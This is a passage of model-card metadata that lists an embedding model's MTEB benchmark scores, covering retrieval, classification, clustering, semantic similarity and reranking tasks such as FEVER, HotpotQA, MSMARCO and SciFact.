value: 20.896
- type: precision_at_10
value: 5.56
- type: precision_at_100
value: 1.006
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 12.231
- type: precision_at_5
value: 9.104
- type: recall_at_1
value: 16.683
- type: recall_at_10
value: 41.807
- type: recall_at_100
value: 69.219
- type: recall_at_1000
value: 89.178
- type: recall_at_3
value: 28.772
- type: recall_at_5
value: 35.167
- type: map_at_1
value: 30.653000000000002
- type: map_at_10
value: 41.21
- type: map_at_100
value: 42.543
- type: map_at_1000
value: 42.657000000000004
- type: map_at_3
value: 38.094
- type: map_at_5
value: 39.966
- type: mrr_at_1
value: 37.824999999999996
- type: mrr_at_10
value: 47.087
- type: mrr_at_100
value: 47.959
- type: mrr_at_1000
value: 48.003
- type: mrr_at_3
value: 45.043
- type: mrr_at_5
value: 46.352
- type: ndcg_at_1
value: 37.824999999999996
- type: ndcg_at_10
value: 47.158
- type: ndcg_at_100
value: 52.65
- type: ndcg_at_1000
value: 54.644999999999996
- type: ndcg_at_3
value: 42.632999999999996
- type: ndcg_at_5
value: 44.994
- type: precision_at_1
value: 37.824999999999996
- type: precision_at_10
value: 8.498999999999999
- type: precision_at_100
value: 1.308
- type: precision_at_1000
value: 0.166
- type: precision_at_3
value: 20.308
- type: precision_at_5
value: 14.283000000000001
- type: recall_at_1
value: 30.653000000000002
- type: recall_at_10
value: 58.826
- type: recall_at_100
value: 81.94
- type: recall_at_1000
value: 94.71000000000001
- type: recall_at_3
value: 45.965
- type: recall_at_5
value: 52.294
- type: map_at_1
value: 26.71
- type: map_at_10
value: 36.001
- type: map_at_100
value: 37.416
- type: map_at_1000
value: 37.522
- type: map_at_3
value: 32.841
- type: map_at_5
value: 34.515
- type: mrr_at_1
value: 32.647999999999996
- type: mrr_at_10
value: 41.43
- type: mrr_at_100
value: 42.433
- type: mrr_at_1000
value: 42.482
- type: mrr_at_3
value: 39.117000000000004
- type: mrr_at_5
value: 40.35
- type: ndcg_at_1
value: 32.647999999999996
- type: ndcg_at_10
value: 41.629
- type: ndcg_at_100
value: 47.707
- type: ndcg_at_1000
value: 49.913000000000004
- type: ndcg_at_3
value: 36.598000000000006
- type: ndcg_at_5
value: 38.696000000000005
- type: precision_at_1
value: 32.647999999999996
- type: precision_at_10
value: 7.704999999999999
- type: precision_at_100
value: 1.242
- type: precision_at_1000
value: 0.16
- type: precision_at_3
value: 17.314
- type: precision_at_5
value: 12.374
- type: recall_at_1
value: 26.71
- type: recall_at_10
value: 52.898
- type: recall_at_100
value: 79.08
- type: recall_at_1000
value: 93.94
- type: recall_at_3
value: 38.731
- type: recall_at_5
value: 44.433
- type: map_at_1
value: 26.510999999999996
- type: map_at_10
value: 35.755333333333326
- type: map_at_100
value: 36.97525
- type: map_at_1000
value: 37.08741666666667
- type: map_at_3
value: 32.921
- type: map_at_5
value: 34.45041666666667
- type: mrr_at_1
value: 31.578416666666666
- type: mrr_at_10
value: 40.06066666666667
- type: mrr_at_100
value: 40.93350000000001
- type: mrr_at_1000
value: 40.98716666666667
- type: mrr_at_3
value: 37.710499999999996
- type: mrr_at_5
value: 39.033249999999995
- type: ndcg_at_1
value: 31.578416666666666
- type: ndcg_at_10
value: 41.138666666666666
- type: ndcg_at_100
value: 46.37291666666666
- type: ndcg_at_1000
value: 48.587500000000006
- type: ndcg_at_3
value: 36.397083333333335
- type: ndcg_at_5
value: 38.539
- type: precision_at_1
value: 31.578416666666666
- type: precision_at_10
value: 7.221583333333332
- type: precision_at_100
value: 1.1581666666666668
- type: precision_at_1000
value: 0.15416666666666667
- type: precision_at_3
value: 16.758
- type: precision_at_5
value: 11.830916666666665
- type: recall_at_1
value: 26.510999999999996
- type: recall_at_10
value: 52.7825
- type: recall_at_100
value: 75.79675
- type: recall_at_1000
value: 91.10483333333335
- type: recall_at_3
value: 39.48233333333334
- type: recall_at_5
value: 45.07116666666667
- type: map_at_1
value: 24.564
- type: map_at_10
value: 31.235000000000003
- type: map_at_100
value: 32.124
- type: map_at_1000
value: 32.216
- type: map_at_3
value: 29.330000000000002
- type: map_at_5
value: 30.379
- type: mrr_at_1
value: 27.761000000000003
- type: mrr_at_10
value: 34.093
- type: mrr_at_100
value: 34.885
- type: mrr_at_1000
value: 34.957
- type: mrr_at_3
value: 32.388
- type: mrr_at_5
value: 33.269
- type: ndcg_at_1
value: 27.761000000000003
- type: ndcg_at_10
value: 35.146
- type: ndcg_at_100
value: 39.597
- type: ndcg_at_1000
value: 42.163000000000004
- type: ndcg_at_3
value: 31.674000000000003
- type: ndcg_at_5
value: 33.224
- type: precision_at_1
value: 27.761000000000003
- type: precision_at_10
value: 5.383
- type: precision_at_100
value: 0.836
- type: precision_at_1000
value: 0.11199999999999999
- type: precision_at_3
value: 13.599
- type: precision_at_5
value: 9.202
- type: recall_at_1
value: 24.564
- type: recall_at_10
value: 44.36
- type: recall_at_100
value: 64.408
- type: recall_at_1000
value: 83.892
- type: recall_at_3
value: 34.653
- type: recall_at_5
value: 38.589
- type: map_at_1
value: 17.01
- type: map_at_10
value: 24.485
- type: map_at_100
value: 25.573
- type: map_at_1000
value: 25.703
- type: map_at_3
value: 21.953
- type: map_at_5
value: 23.294999999999998
- type: mrr_at_1
value: 20.544
- type: mrr_at_10
value: 28.238000000000003
- type: mrr_at_100
value: 29.142000000000003
- type: mrr_at_1000
value: 29.219
- type: mrr_at_3
value: 25.802999999999997
- type: mrr_at_5
value: 27.105
- type: ndcg_at_1
value: 20.544
- type: ndcg_at_10
value: 29.387999999999998
- type: ndcg_at_100
value: 34.603
- type: ndcg_at_1000
value: 37.564
- type: ndcg_at_3
value: 24.731
- type: ndcg_at_5
value: 26.773000000000003
- type: precision_at_1
value: 20.544
- type: precision_at_10
value: 5.509
- type: precision_at_100
value: 0.9450000000000001
- type: precision_at_1000
value: 0.13799999999999998
- type: precision_at_3
value: 11.757
- type: precision_at_5
value: 8.596
- type: recall_at_1
value: 17.01
- type: recall_at_10
value: 40.392
- type: recall_at_100
value: 64.043
- type: recall_at_1000
value: 85.031
- type: recall_at_3
value: 27.293
- type: recall_at_5
value: 32.586999999999996
- type: map_at_1
value: 27.155
- type: map_at_10
value: 35.92
- type: map_at_100
value: 37.034
- type: map_at_1000
value: 37.139
- type: map_at_3
value: 33.263999999999996
- type: map_at_5
value: 34.61
- type: mrr_at_1
value: 32.183
- type: mrr_at_10
value: 40.099000000000004
- type: mrr_at_100
value: 41.001
- type: mrr_at_1000
value: 41.059
- type: mrr_at_3
value: 37.889
- type: mrr_at_5
value: 39.007999999999996
- type: ndcg_at_1
value: 32.183
- type: ndcg_at_10
value: 41.127
- type: ndcg_at_100
value: 46.464
- type: ndcg_at_1000
value: 48.67
- type: ndcg_at_3
value: 36.396
- type: ndcg_at_5
value: 38.313
- type: precision_at_1
value: 32.183
- type: precision_at_10
value: 6.847
- type: precision_at_100
value: 1.0739999999999998
- type: precision_at_1000
value: 0.13699999999999998
- type: precision_at_3
value: 16.356
- type: precision_at_5
value: 11.362
- type: recall_at_1
value: 27.155
- type: recall_at_10
value: 52.922000000000004
- type: recall_at_100
value: 76.39
- type: recall_at_1000
value: 91.553
- type: recall_at_3
value: 39.745999999999995
- type: recall_at_5
value: 44.637
- type: map_at_1
value: 25.523
- type: map_at_10
value: 34.268
- type: map_at_100
value: 35.835
- type: map_at_1000
value: 36.046
- type: map_at_3
value: 31.662000000000003
- type: map_at_5
value: 32.71
- type: mrr_at_1
value: 31.028
- type: mrr_at_10
value: 38.924
- type: mrr_at_100
value: 39.95
- type: mrr_at_1000
value: 40.003
- type: mrr_at_3
value: 36.594
- type: mrr_at_5
value: 37.701
- type: ndcg_at_1
value: 31.028
- type: ndcg_at_10
value: 39.848
- type: ndcg_at_100
value: 45.721000000000004
- type: ndcg_at_1000
value: 48.424
- type: ndcg_at_3
value: 35.329
- type: ndcg_at_5
value: 36.779
- type: precision_at_1
value: 31.028
- type: precision_at_10
value: 7.51
- type: precision_at_100
value: 1.478
- type: precision_at_1000
value: 0.24
- type: precision_at_3
value: 16.337
- type: precision_at_5
value: 11.383000000000001
- type: recall_at_1
value: 25.523
- type: recall_at_10
value: 50.735
- type: recall_at_100
value: 76.593
- type: recall_at_1000
value: 93.771
- type: recall_at_3
value: 37.574000000000005
- type: recall_at_5
value: 41.602
- type: map_at_1
value: 20.746000000000002
- type: map_at_10
value: 28.557
- type: map_at_100
value: 29.575000000000003
- type: map_at_1000
value: 29.659000000000002
- type: map_at_3
value: 25.753999999999998
- type: map_at_5
value: 27.254
- type: mrr_at_1
value: 22.736
- type: mrr_at_10
value: 30.769000000000002
- type: mrr_at_100
value: 31.655
- type: mrr_at_1000
value: 31.717000000000002
- type: mrr_at_3
value: 28.065
- type: mrr_at_5
value: 29.543999999999997
- type: ndcg_at_1
value: 22.736
- type: ndcg_at_10
value: 33.545
- type: ndcg_at_100
value: 38.743
- type: ndcg_at_1000
value: 41.002
- type: ndcg_at_3
value: 28.021
- type: ndcg_at_5
value: 30.586999999999996
- type: precision_at_1
value: 22.736
- type: precision_at_10
value: 5.416
- type: precision_at_100
value: 0.8710000000000001
- type: precision_at_1000
value: 0.116
- type: precision_at_3
value: 11.953
- type: precision_at_5
value: 8.651
- type: recall_at_1
value: 20.746000000000002
- type: recall_at_10
value: 46.87
- type: recall_at_100
value: 71.25200000000001
- type: recall_at_1000
value: 88.26
- type: recall_at_3
value: 32.029999999999994
- type: recall_at_5
value: 38.21
- task:
type: Retrieval
dataset:
name: MTEB ClimateFEVER
type: climate-fever
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 12.105
- type: map_at_10
value: 20.577
- type: map_at_100
value: 22.686999999999998
- type: map_at_1000
value: 22.889
- type: map_at_3
value: 17.174
- type: map_at_5
value: 18.807
- type: mrr_at_1
value: 27.101
- type: mrr_at_10
value: 38.475
- type: mrr_at_100
value: 39.491
- type: mrr_at_1000
value: 39.525
- type: mrr_at_3
value: 34.886
- type: mrr_at_5
value: 36.922
- type: ndcg_at_1
value: 27.101
- type: ndcg_at_10
value: 29.002
- type: ndcg_at_100
value: 37.218
- type: ndcg_at_1000
value: 40.644000000000005
- type: ndcg_at_3
value: 23.464
- type: ndcg_at_5
value: 25.262
- type: precision_at_1
value: 27.101
- type: precision_at_10
value: 9.179
- type: precision_at_100
value: 1.806
- type: precision_at_1000
value: 0.244
- type: precision_at_3
value: 17.394000000000002
- type: precision_at_5
value: 13.342
- type: recall_at_1
value: 12.105
- type: recall_at_10
value: 35.143
- type: recall_at_100
value: 63.44499999999999
- type: recall_at_1000
value: 82.49499999999999
- type: recall_at_3
value: 21.489
- type: recall_at_5
value: 26.82
- task:
type: Retrieval
dataset:
name: MTEB DBPedia
type: dbpedia-entity
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 8.769
- type: map_at_10
value: 18.619
- type: map_at_100
value: 26.3
- type: map_at_1000
value: 28.063
- type: map_at_3
value: 13.746
- type: map_at_5
value: 16.035
- type: mrr_at_1
value: 65.25
- type: mrr_at_10
value: 73.678
- type: mrr_at_100
value: 73.993
- type: mrr_at_1000
value: 74.003
- type: mrr_at_3
value: 72.042
- type: mrr_at_5
value: 72.992
- type: ndcg_at_1
value: 53.625
- type: ndcg_at_10
value: 39.638
- type: ndcg_at_100
value: 44.601
- type: ndcg_at_1000
value: 52.80200000000001
- type: ndcg_at_3
value: 44.727
- type: ndcg_at_5
value: 42.199
- type: precision_at_1
value: 65.25
- type: precision_at_10
value: 31.025000000000002
- type: precision_at_100
value: 10.174999999999999
- type: precision_at_1000
value: 2.0740000000000003
- type: precision_at_3
value: 48.083
- type: precision_at_5
value: 40.6
- type: recall_at_1
value: 8.769
- type: recall_at_10
value: 23.910999999999998
- type: recall_at_100
value: 51.202999999999996
- type: recall_at_1000
value: 77.031
- type: recall_at_3
value: 15.387999999999998
- type: recall_at_5
value: 18.919
- task:
type: Classification
dataset:
name: MTEB EmotionClassification
type: mteb/emotion
config: default
split: test
revision: 4f58c6b202a23cf9a4da393831edf4f9183cad37
metrics:
- type: accuracy
value: 54.47
- type: f1
value: 48.21839043361556
- task:
type: Retrieval
dataset:
name: MTEB FEVER
type: fever
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 63.564
- type: map_at_10
value: 74.236
- type: map_at_100
value: 74.53699999999999
- type: map_at_1000
value: 74.557
- type: map_at_3
value: 72.556
- type: map_at_5
value: 73.656
- type: mrr_at_1
value: 68.497
- type: mrr_at_10
value: 78.373
- type: mrr_at_100
value: 78.54299999999999
- type: mrr_at_1000
value: 78.549
- type: mrr_at_3
value: 77.03
- type: mrr_at_5
value: 77.938
- type: ndcg_at_1
value: 68.497
- type: ndcg_at_10
value: 79.12599999999999
- type: ndcg_at_100
value: 80.319
- type: ndcg_at_1000
value: 80.71199999999999
- type: ndcg_at_3
value: 76.209
- type: ndcg_at_5
value: 77.90700000000001
- type: precision_at_1
value: 68.497
- type: precision_at_10
value: 9.958
- type: precision_at_100
value: 1.077
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 29.908
- type: precision_at_5
value: 18.971
- type: recall_at_1
value: 63.564
- type: recall_at_10
value: 90.05199999999999
- type: recall_at_100
value: 95.028
- type: recall_at_1000
value: 97.667
- type: recall_at_3
value: 82.17999999999999
- type: recall_at_5
value: 86.388
- task:
type: Retrieval
dataset:
name: MTEB FiQA2018
type: fiqa
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 19.042
- type: map_at_10
value: 30.764999999999997
- type: map_at_100
value: 32.678000000000004
- type: map_at_1000
value: 32.881
- type: map_at_3
value: 26.525
- type: map_at_5
value: 28.932000000000002
- type: mrr_at_1
value: 37.653999999999996
- type: mrr_at_10
value: 46.597
- type: mrr_at_100
value: 47.413
- type: mrr_at_1000
value: 47.453
- type: mrr_at_3
value: 43.775999999999996
- type: mrr_at_5
value: 45.489000000000004
- type: ndcg_at_1
value: 37.653999999999996
- type: ndcg_at_10
value: 38.615
- type: ndcg_at_100
value: 45.513999999999996
- type: ndcg_at_1000
value: 48.815999999999995
- type: ndcg_at_3
value: 34.427
- type: ndcg_at_5
value: 35.954
- type: precision_at_1
value: 37.653999999999996
- type: precision_at_10
value: 10.864
- type: precision_at_100
value: 1.7850000000000001
- type: precision_at_1000
value: 0.23800000000000002
- type: precision_at_3
value: 22.788
- type: precision_at_5
value: 17.346
- type: recall_at_1
value: 19.042
- type: recall_at_10
value: 45.707
- type: recall_at_100
value: 71.152
- type: recall_at_1000
value: 90.7
- type: recall_at_3
value: 30.814000000000004
- type: recall_at_5
value: 37.478
- task:
type: Retrieval
dataset:
name: MTEB HotpotQA
type: hotpotqa
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 38.001000000000005
- type: map_at_10
value: 59.611000000000004
- type: map_at_100
value: 60.582
- type: map_at_1000
value: 60.646
- type: map_at_3
value: 56.031
- type: map_at_5
value: 58.243
- type: mrr_at_1
value: 76.003
- type: mrr_at_10
value: 82.15400000000001
- type: mrr_at_100
value: 82.377
- type: mrr_at_1000
value: 82.383
- type: mrr_at_3
value: 81.092
- type: mrr_at_5
value: 81.742
- type: ndcg_at_1
value: 76.003
- type: ndcg_at_10
value: 68.216
- type: ndcg_at_100
value: 71.601
- type: ndcg_at_1000
value: 72.821
- type: ndcg_at_3
value: 63.109
- type: ndcg_at_5
value: 65.902
- type: precision_at_1
value: 76.003
- type: precision_at_10
value: 14.379
- type: precision_at_100
value: 1.702
- type: precision_at_1000
value: 0.186
- type: precision_at_3
value: 40.396
- type: precision_at_5
value: 26.442
- type: recall_at_1
value: 38.001000000000005
- type: recall_at_10
value: 71.897
- type: recall_at_100
value: 85.105
- type: recall_at_1000
value: 93.133
- type: recall_at_3
value: 60.594
- type: recall_at_5
value: 66.104
- task:
type: Classification
dataset:
name: MTEB ImdbClassification
type: mteb/imdb
config: default
split: test
revision: 3d86128a09e091d6018b6d26cad27f2739fc2db7
metrics:
- type: accuracy
value: 91.31280000000001
- type: ap
value: 87.53723467501632
- type: f1
value: 91.30282906596291
- task:
type: Retrieval
dataset:
name: MTEB MSMARCO
type: msmarco
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 21.917
- type: map_at_10
value: 34.117999999999995
- type: map_at_100
value: 35.283
- type: map_at_1000
value: 35.333999999999996
- type: map_at_3
value: 30.330000000000002
- type: map_at_5
value: 32.461
- type: mrr_at_1
value: 22.579
- type: mrr_at_10
value: 34.794000000000004
- type: mrr_at_100
value: 35.893
- type: mrr_at_1000
value: 35.937000000000005
- type: mrr_at_3
value: 31.091
- type: mrr_at_5
value: 33.173
- type: ndcg_at_1
value: 22.579
- type: ndcg_at_10
value: 40.951
- type: ndcg_at_100
value: 46.558
- type: ndcg_at_1000
value: 47.803000000000004
- type: ndcg_at_3
value: 33.262
- type: ndcg_at_5
value: 37.036
- type: precision_at_1
value: 22.579
- type: precision_at_10
value: 6.463000000000001
- type: precision_at_100
value: 0.928
- type: precision_at_1000
value: 0.104
- type: precision_at_3
value: 14.174000000000001
- type: precision_at_5
value: 10.421
- type: recall_at_1
value: 21.917
- type: recall_at_10
value: 61.885
- type: recall_at_100
value: 87.847
- type: recall_at_1000
value: 97.322
- type: recall_at_3
value: 41.010000000000005
- type: recall_at_5
value: 50.031000000000006
- task:
type: Classification
dataset:
name: MTEB MTOPDomainClassification (en)
type: mteb/mtop_domain
config: en
split: test
revision: d80d48c1eb48d3562165c59d59d0034df9fff0bf
metrics:
- type: accuracy
value: 93.49521203830369
- type: f1
value: 93.30882341740241
- task:
type: Classification
dataset:
name: MTEB MTOPIntentClassification (en)
type: mteb/mtop_intent
config: en
split: test
revision: ae001d0e6b1228650b7bd1c2c65fb50ad11a8aba
metrics:
- type: accuracy
value: 71.0579115367077
- type: f1
value: 51.2368258319339
- task:
type: Classification
dataset:
name: MTEB MassiveIntentClassification (en)
type: mteb/amazon_massive_intent
config: en
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 73.88029589778077
- type: f1
value: 72.34422048584663
- task:
type: Classification
dataset:
name: MTEB MassiveScenarioClassification (en)
type: mteb/amazon_massive_scenario
config: en
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 78.2817753866846
- type: f1
value: 77.87746050004304
- task:
type: Clustering
dataset:
name: MTEB MedrxivClusteringP2P
type: mteb/medrxiv-clustering-p2p
config: default
split: test
revision: e7a26af6f3ae46b30dde8737f02c07b1505bcc73
metrics:
- type: v_measure
value: 33.247341454119216
- task:
type: Clustering
dataset:
name: MTEB MedrxivClusteringS2S
type: mteb/medrxiv-clustering-s2s
config: default
split: test
revision: 35191c8c0dca72d8ff3efcd72aa802307d469663
metrics:
- type: v_measure
value: 31.9647477166234
- task:
type: Reranking
dataset:
name: MTEB MindSmallReranking
type: mteb/mind_small
config: default
split: test
revision: 3bdac13927fdc888b903db93b2ffdbd90b295a69
metrics:
- type: map
value: 31.90698374676892
- type: mrr
value: 33.07523683771251
- task:
type: Retrieval
dataset:
name: MTEB NFCorpus
type: nfcorpus
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 6.717
- type: map_at_10
value: 14.566
- type: map_at_100
value: 18.465999999999998
- type: map_at_1000
value: 20.033
- type: map_at_3
value: 10.863
- type: map_at_5
value: 12.589
- type: mrr_at_1
value: 49.845
- type: mrr_at_10
value: 58.385
- type: mrr_at_100
value: 58.989999999999995
- type: mrr_at_1000
value: 59.028999999999996
- type: mrr_at_3
value: 56.76
- type: mrr_at_5
value: 57.766
- type: ndcg_at_1
value: 47.678
- type: ndcg_at_10
value: 37.511
- type: ndcg_at_100
value: 34.537
- type: ndcg_at_1000
value: 43.612
- type: ndcg_at_3
value: 43.713
- type: ndcg_at_5
value: 41.303
- type: precision_at_1
value: 49.845
- type: precision_at_10
value: 27.307
- type: precision_at_100
value: 8.746
- type: precision_at_1000
value: 2.182
- type: precision_at_3
value: 40.764
- type: precision_at_5
value: 35.232
- type: recall_at_1
value: 6.717
- type: recall_at_10
value: 18.107
- type: recall_at_100
value: 33.759
- type: recall_at_1000
value: 67.31
- type: recall_at_3
value: 11.68
- type: recall_at_5
value: 14.557999999999998
- task:
type: Retrieval
dataset:
name: MTEB NQ
type: nq
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.633999999999997
- type: map_at_10
value: 42.400999999999996
- type: map_at_100
value: 43.561
- type: map_at_1000
value: 43.592
- type: map_at_3
value: 37.865
- type: map_at_5
value: 40.650999999999996
- type: mrr_at_1
value: 31.286
- type: mrr_at_10
value: 44.996
- type: mrr_at_100
value: 45.889
- type: mrr_at_1000
value: 45.911
- type: mrr_at_3
value: 41.126000000000005
- type: mrr_at_5
value: 43.536
- type: ndcg_at_1
value: 31.257
- type: ndcg_at_10
value: 50.197
- type: ndcg_at_100
value: 55.062
- type: ndcg_at_1000
value: 55.81700000000001
- type: ndcg_at_3
value: 41.650999999999996
- type: ndcg_at_5
value: 46.324
- type: precision_at_1
value: 31.257
- type: precision_at_10
value: 8.508000000000001
- type: precision_at_100
value: 1.121
- type: precision_at_1000
value: 0.11900000000000001
- type: precision_at_3
value: 19.1
- type: precision_at_5
value: 14.16
- type: recall_at_1
value: 27.633999999999997
- type: recall_at_10
value: 71.40100000000001
- type: recall_at_100
value: 92.463
- type: recall_at_1000
value: 98.13199999999999
- type: recall_at_3
value: 49.382
- type: recall_at_5
value: 60.144
- task:
type: Retrieval
dataset:
name: MTEB QuoraRetrieval
type: quora
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 71.17099999999999
- type: map_at_10
value: 85.036
- type: map_at_100
value: 85.67099999999999
- type: map_at_1000
value: 85.68599999999999
- type: map_at_3
value: 82.086
- type: map_at_5
value: 83.956
- type: mrr_at_1
value: 82.04
- type: mrr_at_10
value: 88.018
- type: mrr_at_100
value: 88.114
- type: mrr_at_1000
value: 88.115
- type: mrr_at_3
value: 87.047
- type: mrr_at_5
value: 87.73100000000001
- type: ndcg_at_1
value: 82.03
- type: ndcg_at_10
value: 88.717
- type: ndcg_at_100
value: 89.904
- type: ndcg_at_1000
value: 89.991
- type: ndcg_at_3
value: 85.89099999999999
- type: ndcg_at_5
value: 87.485
- type: precision_at_1
value: 82.03
- type: precision_at_10
value: 13.444999999999999
- type: precision_at_100
value: 1.533
- type: precision_at_1000
value: 0.157
- type: precision_at_3
value: 37.537
- type: precision_at_5
value: 24.692
- type: recall_at_1
value: 71.17099999999999
- type: recall_at_10
value: 95.634
- type: recall_at_100
value: 99.614
- type: recall_at_1000
value: 99.99
- type: recall_at_3
value: 87.48
- type: recall_at_5
value: 91.996
- task:
type: Clustering
dataset:
name: MTEB RedditClustering
type: mteb/reddit-clustering
config: default
split: test
revision: 24640382cdbf8abc73003fb0fa6d111a705499eb
metrics:
- type: v_measure
value: 55.067219624685315
- task:
type: Clustering
dataset:
name: MTEB RedditClusteringP2P
type: mteb/reddit-clustering-p2p
config: default
split: test
revision: 282350215ef01743dc01b456c7f5241fa8937f16
metrics:
- type: v_measure
value: 62.121822992300444
- task:
type: Retrieval
dataset:
name: MTEB SCIDOCS
type: scidocs
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 4.153
- type: map_at_10
value: 11.024000000000001
- type: map_at_100
value: 13.233
- type: map_at_1000
value: 13.62
- type: map_at_3
value: 7.779999999999999
- type: map_at_5
value: 9.529
- type: mrr_at_1
value: 20.599999999999998
- type: mrr_at_10
value: 31.361
- type: mrr_at_100
value: 32.738
- type: mrr_at_1000
value: 32.792
- type: mrr_at_3
value: 28.15
- type: mrr_at_5
value: 30.085
- type: ndcg_at_1
value: 20.599999999999998
- type: ndcg_at_10
value: 18.583
- type: ndcg_at_100
value: 27.590999999999998
- type: ndcg_at_1000
value: 34.001
- type: ndcg_at_3
value: 17.455000000000002
- type: ndcg_at_5
value: 15.588
- type: precision_at_1
value: 20.599999999999998
- type: precision_at_10
value: 9.74
- type: precision_at_100
value: 2.284
- type: precision_at_1000
value: 0.381
- type: precision_at_3
value: 16.533
- type: precision_at_5
value: 14.02
- type: recall_at_1
value: 4.153
- type: recall_at_10
value: 19.738
- type: recall_at_100
value: 46.322
- type: recall_at_1000
value: 77.378
- type: recall_at_3
value: 10.048
- type: recall_at_5
value: 14.233
- task:
type: STS
dataset:
name: MTEB SICK-R
type: mteb/sickr-sts
config: default
split: test
revision: a6ea5a8cab320b040a23452cc28066d9beae2cee
metrics:
- type: cos_sim_pearson
value: 85.07097501003639
- type: cos_sim_spearman
value: 81.05827848407056
- type: euclidean_pearson
value: 82.6279003372546
- type: euclidean_spearman
value: 81.00031515279802
- type: manhattan_pearson
value: 82.59338284959495
- type: manhattan_spearman
value: 80.97432711064945
- task:
type: STS
dataset:
name: MTEB STS12
type: mteb/sts12-sts
config: default
split: test
revision: a0d554a64d88156834ff5ae9920b964011b16384
metrics:
- type: cos_sim_pearson
value: 86.28991993621685
- type: cos_sim_spearman
value: 78.71828082424351
- type: euclidean_pearson
value: 83.4881331520832
- type: euclidean_spearman
value: 78.51746826842316
- type: manhattan_pearson
value: 83.4109223774324
- type: manhattan_spearman
value: 78.431544382179
- task:
type: STS
dataset:
name: MTEB STS13
type: mteb/sts13-sts
config: default
split: test
revision: 7e90230a92c190f1bf69ae9002b8cea547a64cca
metrics:
- type: cos_sim_pearson
value: 83.16651661072123
- type: cos_sim_spearman
value: 84.88094386637867
- type: euclidean_pearson
value: 84.3547603585416
- type: euclidean_spearman
value: 84.85148665860193
- type: manhattan_pearson
value: 84.29648369879266
- type: manhattan_spearman
value: 84.76074870571124
- task:
type: STS
dataset:
name: MTEB STS14
type: mteb/sts14-sts
config: default
split: test
revision: 6031580fec1f6af667f0bd2da0a551cf4f0b2375
metrics:
- type: cos_sim_pearson
value: 83.40596254292149
- type: cos_sim_spearman
value: 83.10699573133829
- type: euclidean_pearson
value: 83.22794776876958
- type: euclidean_spearman
value: 83.22583316084712
- type: manhattan_pearson
value: 83.15899233935681
- type: manhattan_spearman
value: 83.17668293648019
- task:
type: STS
dataset:
name: MTEB STS15
type: mteb/sts15-sts
config: default
split: test
revision: ae752c7c21bf194d8b67fd573edf7ae58183cbe3
metrics:
- type: cos_sim_pearson
value: 87.27977121352563
- type: cos_sim_spearman
value: 88.73903130248591
- type: euclidean_pearson
value: 88.30685958438735
- type: euclidean_spearman
value: 88.79755484280406
- type: manhattan_pearson
value: 88.30305607758652
- type: manhattan_spearman
value: 88.80096577072784
- task:
type: STS
dataset:
name: MTEB STS16
type: mteb/sts16-sts
config: default
split: test
revision: 4d8694f8f0e0100860b497b999b3dbed754a0513
metrics:
- type: cos_sim_pearson
value: 84.08819031430218
- type: cos_sim_spearman
value: 86.35414445951125
- type: euclidean_pearson
value: 85.4683192388315
- type: euclidean_spearman
value: 86.2079674669473
- type: manhattan_pearson
value: 85.35835702257341
- type: manhattan_spearman
value: 86.08483380002187
- task:
type: STS
dataset:
name: MTEB STS17 (en-en)
type: mteb/sts17-crosslingual-sts
config: en-en
split: test
revision: af5e6fb845001ecf41f4c1e033ce921939a2a68d
metrics:
- type: cos_sim_pearson
value: 87.36149449801478
- type: cos_sim_spearman
value: 87.7102980757725
- type: euclidean_pearson
value: 88.16457177837161
- type: euclidean_spearman
value: 87.6598652482716
- type: manhattan_pearson
value: 88.23894728971618
- type: manhattan_spearman
value: 87.74470156709361
- task:
type: STS
dataset:
name: MTEB STS22 (en)
type: mteb/sts22-crosslingual-sts
config: en
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 64.54023758394433
- type: cos_sim_spearman
value: 66.28491960187773
- type: euclidean_pearson
value: 67.0853128483472
- type: euclidean_spearman
value: 66.10307543766307
- type: manhattan_pearson
value: 66.7635365592556
- type: manhattan_spearman
value: 65.76408004780167
- task:
type: STS
dataset:
name: MTEB STSBenchmark
type: mteb/stsbenchmark-sts
config: default
split: test
revision: b0fddb56ed78048fa8b90373c8a3cfc37b684831
metrics:
- type: cos_sim_pearson
value: 85.15858398195317
- type: cos_sim_spearman
value: 87.44850004752102
- type: euclidean_pearson
value: 86.60737082550408
- type: euclidean_spearman
value: 87.31591549824242
- type: manhattan_pearson
value: 86.56187011429977
- type: manhattan_spearman
value: 87.23854795795319
- task:
type: Reranking
dataset:
name: MTEB SciDocsRR
type: mteb/scidocs-reranking
config: default
split: test
revision: d3c5e1fc0b855ab6097bf1cda04dd73947d7caab
metrics:
- type: map
value: 86.66210488769109
- type: mrr
value: 96.23100664767331
- task:
type: Retrieval
dataset:
name: MTEB SciFact
type: scifact
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 56.094
- type: map_at_10
value: 67.486
- type: map_at_100
value: 67.925
- type: map_at_1000
value: 67.949
- type: map_at_3
value: 64.857
- type: map_at_5
value: 66.31
- type: mrr_at_1
value: 58.667
- type: mrr_at_10
value: 68.438
- type: mrr_at_100
value: 68.733
- type: mrr_at_1000
value: 68.757
- type: mrr_at_3
value: 66.389
- type: mrr_at_5
value: 67.456
- type: ndcg_at_1
value: 58.667
- type: ndcg_at_10
value: 72.506
- type: ndcg_at_100
value: 74.27
- type: ndcg_at_1000
value: 74.94800000000001
- type: ndcg_at_3
value: 67.977
- type: ndcg_at_5
value: 70.028
- type: precision_at_1
value: 58.667
- type: precision_at_10
value: 9.767000000000001
- type: precision_at_100
value: 1.073
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 27.0
- type: precision_at_5
value: 17.666999999999998
- type: recall_at_1
value: 56.094
- type: recall_at_10
value: 86.68900000000001
- type: recall_at_100
value: 94.333
- type: recall_at_1000
value: 99.667
- type: recall_at_3
value: 74.522
- type: recall_at_5
value: 79.611
- task:
type: PairClassification
dataset:
